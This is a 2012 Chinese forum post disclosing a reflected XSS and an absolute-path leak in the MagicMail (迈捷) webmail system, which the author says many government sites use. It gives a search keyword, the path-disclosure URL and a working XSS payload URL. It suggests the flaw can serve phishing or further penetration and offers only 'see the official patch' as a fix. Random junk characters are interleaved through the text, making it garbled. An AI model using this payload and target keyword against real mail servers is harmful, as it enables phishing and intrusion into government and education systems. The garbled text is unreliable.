今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
; D6 q+ r( i$ E+ h
6 f+ M& e# H# D" y2 C, y % d) [7 R: a( K" m& T) \# O/ E
包含 一个反射性XSS 以及 绝对路径泄漏
" ^9 j& g5 C) l0 u* ~看了看 貌似全部是linux的。0 q6 |" ?- H1 f) a
/ C7 F! P) j. i& b5 G; U* P
关键字:迈捷邮件系统 by MagicMail& G9 R% Q/ e0 N
& E( v8 t, J% O- ~1 b
可以看到很多政府网站都用这个邮件系统
5 R1 L4 N) v3 p7 I( A N2 X( i0 }: p$ V$ q3 O9 @0 [) W* G
绝对路径 http://madman.in/index.php?login_type=declare&language=9 h" |" a4 K" c0 i/ D
2 E# |% v0 ?; D! ^8 H5 i W7 d
* Y/ w1 }& Z3 r" r1 X* u
( ^$ f: ]9 D2 s) b% L& d
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
+ r8 n0 j: Q7 m* G1 c
. H4 e+ w! D. z0 j
# s$ H7 ]2 x. ^* f. x# Z4 w- |& x! d- h8 Q3 {- I/ @9 K$ p
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等0 p% E( w' I- Z' [- A" m% r0 U
% W; R3 g; I w% H
修复方案:看官方补丁吧。
' v$ u; |5 z% z0 ]% ?1 G |
发表于 2012-11-9 20:38:41
收藏
分享
支持
反对